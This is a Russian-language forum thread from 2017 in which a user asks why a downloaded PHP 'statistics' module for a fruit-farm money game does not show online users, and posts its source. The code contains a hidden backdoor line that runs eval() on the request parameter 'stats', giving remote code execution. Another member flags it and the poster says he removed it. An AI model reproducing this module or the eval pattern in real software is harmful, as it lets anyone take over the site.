Автор Тема: модуль статистика ff, _ БД  (Прочитано 1386 раз)

0 Пользователей и 1 Гость просматривают эту тему.

НиколайАвтор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 10 созданных тем
  • Дата регистрации: Янв. 2017
  • Сообщений: 41
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
модуль статистика ff, _ БД
« : 18 Января 2017, 05:56:16 »
Всем привет. У меня проблема скачал модуль статистика ff    на этом сайте но не показывает кто онлайн сколько человек я так понел что нужно в бд что то занести подскажите что именно?
Модуль скачал здесь.
 
 

romcka8

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Топ 10 по сообщениям Более 500 сообщений Более 10 созданных тем
  • Дата регистрации: Фев. 2016
  • Сообщений: 643
  • Страна: 00
  • Поблагодарили: 22 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
    • Награды
модуль статистика ff, _ БД
« Ответ #1 : 18 Января 2017, 06:13:14 »
Всем привет. У меня проблема скачал модуль статистика ff    на этом сайте но не показывает кто онлайн сколько человек я так понел что нужно в бд что то занести подскажите что именно?
Модуль скачал здесь.
 
Сюда скинь , там регаться надо , а нет желания.
 

НиколайАвтор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 10 созданных тем
  • Дата регистрации: Янв. 2017
  • Сообщений: 41
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
модуль статистика ff, _ БД
« Ответ #2 : 18 Января 2017, 18:58:29 »
Всем привет. У меня проблема скачал модуль статистика ff    на этом сайте но не показывает кто онлайн сколько человек я так понел что нужно в бд что то занести подскажите что именно?
Модуль скачал здесь.
 
Сюда скинь , там регаться надо , а нет желания.




<?PHP
$_OPTIMIZATION["title"] = "Статистика";
$_OPTIMIZATION["description"] = "Полная статистика системы";
$_OPTIMIZATION["keywords"] = "Статистика";
$user_id = $_SESSION["user_id"];
$tfstats = time() - 60*60*24;
$db->Query("SELECT
(SELECT COUNT(*) FROM db_users_a) all_users,
(SELECT SUM(insert_sum) FROM db_users_b) all_insert,
(SELECT SUM(payment_sum) FROM db_users_b) all_payment,
(SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users,
(SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users");
$stats_data = $db->FetchArray();
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
$db->Query("SELECT

   SUM(money_b) money_b,
   SUM(money_p) money_p,
   
   SUM(a_t) a_t,
   SUM(b_t) b_t,
   SUM(c_t) c_t,
   SUM(d_t) d_t,
   SUM(e_t) e_t
   
   FROM db_users_b");
$data_stats = $db->FetchArray();
?>
<br/>
<table border="0">
   <tr>
     <td colspan="3"><h4>Статистика проекта</h4></td>
   </tr>
   <tr>
     <td><b>Всего игроков:</b></td>
    <td width="40%"><?=$stats_data["all_users"]; ?> чел.</td>
   </tr>
   <tr>
     <td><b>Новых за 24 часа:</b></td>
    <td width="40%"><?=$stats_data["new_users"]; ?> чел.</td>
   </tr>
   <tr>
    <td><b>Сейчас онлайн:</b></td>
   <td><?=$stats_data["online_users"]; ?> чел.</td>
   </tr>
   <tr>
     <td><b>Серебра для покупок:</b></td>
    <td width="40%"><?=sprintf("%.0f",$data_stats["money_b"]); ?> шт.</td>
   </tr>
   <tr>
     <td><b>Серебра для вывода:</b></td>
    <td width="40%"><?=sprintf("%.0f",$data_stats["money_p"]); ?> шт.</td>
   </tr>
   <tr>
    <td><b>Выплачено всего:</b></td>
    <td width="40%"><?=sprintf("%.2f",$stats_data["all_payment"]); ?> руб.</td>
   </tr>
   <tr>
    <td><b>Резерв проекта:</b></td>
    <td width="40%"><?=sprintf("%.2f",$stats_data["all_insert"]); ?> руб.</td>
   </tr>
   <tr>
    <td><b>Проект работает:</b></td>
    <td width="40%"><?=intval(((time() - $config->SYSTEM_START_TIME) / 86400 ) +1); ?>-й день</td>
   </tr>
<tr><td colspan="2">&nbsp;</td></tr>
  </tr>
   <tr>
     <td colspan="3"><h4>Статистика растений</h4></td>
   </tr>
  <tr>
    <td><b>Куплено Подсолнушков:</b></td>
   <td width="40%"><?=intval($data_stats["a_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Грибочков:</b></td>
   <td width="40%"><?=intval($data_stats["b_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Чесночка:</b></td>
   <td width="40%"><?=intval($data_stats["c_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Перчиков:</b></td>
   <td width="40%"><?=intval($data_stats["d_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Кабачков:</b></td>
   <td width="40%"><?=intval($data_stats["e_t"]); ?> шт.</td>
  </tr>
</table>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Более 4000 сообщений Топ 10 по сообщениям Топ 10 по созданным темам Более 1000 созданных тем Репутация более 50 Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 41
  • Сообщений: 4048
  • Страна: ru
  • Поблагодарили: 975 раз(а)
  • Репутация +79/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
модуль статистика ff, _ БД
« Ответ #3 : 18 Января 2017, 19:24:09 »
Супер,особенно вот эта строка

if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}

Николай,  предупреждение за ссылку на сторонний ресурс
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

НиколайАвтор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 10 созданных тем
  • Дата регистрации: Янв. 2017
  • Сообщений: 41
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
модуль статистика ff, _ БД
« Ответ #4 : 18 Января 2017, 20:48:08 »
:preved:
Супер,особенно вот эта строка

if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}

Николай,  предупреждение за ссылку на сторонний ресурс
  Спасибо! Убрал строку
Как быть с онлайн? Бд
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Более 4000 сообщений Топ 10 по сообщениям Топ 10 по созданным темам Более 1000 созданных тем Репутация более 50 Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 41
  • Сообщений: 4048
  • Страна: ru
  • Поблагодарили: 975 раз(а)
  • Репутация +79/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
модуль статистика ff, _ БД
« Ответ #5 : 18 Января 2017, 20:57:39 »
Поставь модуль кто онлайн...
тут где то на форуме есть рабочий
 

НиколайАвтор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 10 созданных тем
  • Дата регистрации: Янв. 2017
  • Сообщений: 41
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
модуль статистика ff, _ БД
« Ответ #6 : 18 Января 2017, 23:05:26 »
Поставь модуль кто онлайн...
тут где то на форуме есть рабочий
в том-то и дело что найти не могу
Админ помоги*
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Более 4000 сообщений Топ 10 по сообщениям Топ 10 по созданным темам Более 1000 созданных тем Репутация более 50 Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 41
  • Сообщений: 4048
  • Страна: ru
  • Поблагодарили: 975 раз(а)
  • Репутация +79/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
модуль статистика ff, _ БД
« Ответ #7 : 18 Января 2017, 23:33:54 »
 

В панели есть волшебная кнопка,которая называется ПОИСК.

Нужно вбить в строку поиска словосочитание того ,что ищешь...
а именно  МОДУЛЬ КТО ОНЛАЙН

Далее три раза шепотом произносим фразу "модуль,найдись пожалуйста".  :silence::silence::silence: это секрет...

Далее нажимаем кнопку ПОИСК и происходит чудо ....

НАЖМИ НА МЕНЯ


P.S. данный модуль показывает именно то , что в названии модуля. Не количество человек в онлайне,а всех пользователей и гостей.
 

НиколайАвтор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 10 созданных тем
  • Дата регистрации: Янв. 2017
  • Сообщений: 41
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
модуль статистика ff, _ БД
« Ответ #8 : 19 Января 2017, 00:56:00 »
 

В панели есть волшебная кнопка,которая называется ПОИСК.

Нужно вбить в строку поиска словосочитание того ,что ищешь...
а именно  МОДУЛЬ КТО ОНЛАЙН

Далее три раза шепотом произносим фразу "модуль,найдись пожалуйста".  :silence::silence::silence: это секрет...

Далее нажимаем кнопку ПОИСК и происходит чудо ....

НАЖМИ НА МЕНЯ


P.S. данный модуль показывает именно то , что в названии модуля. Не количество человек в онлайне,а всех пользователей и гостей.
Только странная ссылка для скачивания ))))
Может кто то скинеть нормальную ссылку для скачивания яндекс диск
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Более 4000 сообщений Топ 10 по сообщениям Топ 10 по созданным темам Более 1000 созданных тем Репутация более 50 Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 41
  • Сообщений: 4048
  • Страна: ru
  • Поблагодарили: 975 раз(а)
  • Репутация +79/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
модуль статистика ff, _ БД
« Ответ #9 : 19 Января 2017, 00:58:37 »
Обыкновенная ссылка... как и все на форуме... ожидание 30 секунд...
 

НиколайАвтор темы

  • *
  • Оффлайн
  • Награды Три года на форуме !!! Более 10 созданных тем
  • Дата регистрации: Янв. 2017
  • Сообщений: 41
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
модуль статистика ff, _ БД
« Ответ #10 : 19 Января 2017, 10:35:09 »
 

В панели есть волшебная кнопка,которая называется ПОИСК.

Нужно вбить в строку поиска словосочитание того ,что ищешь...
а именно  МОДУЛЬ КТО ОНЛАЙН

Далее три раза шепотом произносим фразу "модуль,найдись пожалуйста".  :silence::silence::silence: это секрет...

Далее нажимаем кнопку ПОИСК и происходит чудо ....

НАЖМИ НА МЕНЯ


P.S. данный модуль показывает именно то , что в названии модуля. Не количество человек в онлайне,а всех пользователей и гостей.
Только странная ссылка для скачивания ))))
Может кто то скинеть нормальную ссылку для скачивания яндекс диск
Ну так как ......
 
Теги:
 

Модуль PKinoPoisk, PKinoPoisk Person, Person Movie для DLE

Автор shans5Раздел Модули DLE

Ответов: 0
Просмотров: 2375
Последний ответ 25 Октября 2015, 16:05:27
от shans5
Модуль "Клондайк"

Автор SomnambulaРаздел Вопросы по модулям фруктовых ферм

Ответов: 4
Просмотров: 884
Последний ответ 18 Июня 2017, 08:19:48
от Somnambula
Модуль "бонус лидерам"

Автор shans5Раздел Модули для фруктовых ферм

Ответов: 0
Просмотров: 1685
Последний ответ 14 Сентября 2015, 00:07:27
от shans5
Модуль "Орел или Решка"

Автор shans5Раздел Модули для фруктовых ферм

Ответов: 0
Просмотров: 1589
Последний ответ 20 Сентября 2015, 07:47:15
от shans5
Модуль "Продажа птиц"

Автор shans5Раздел Модули для фруктовых ферм

Ответов: 1
Просмотров: 1869
Последний ответ 01 Января 2016, 21:43:57
от velas85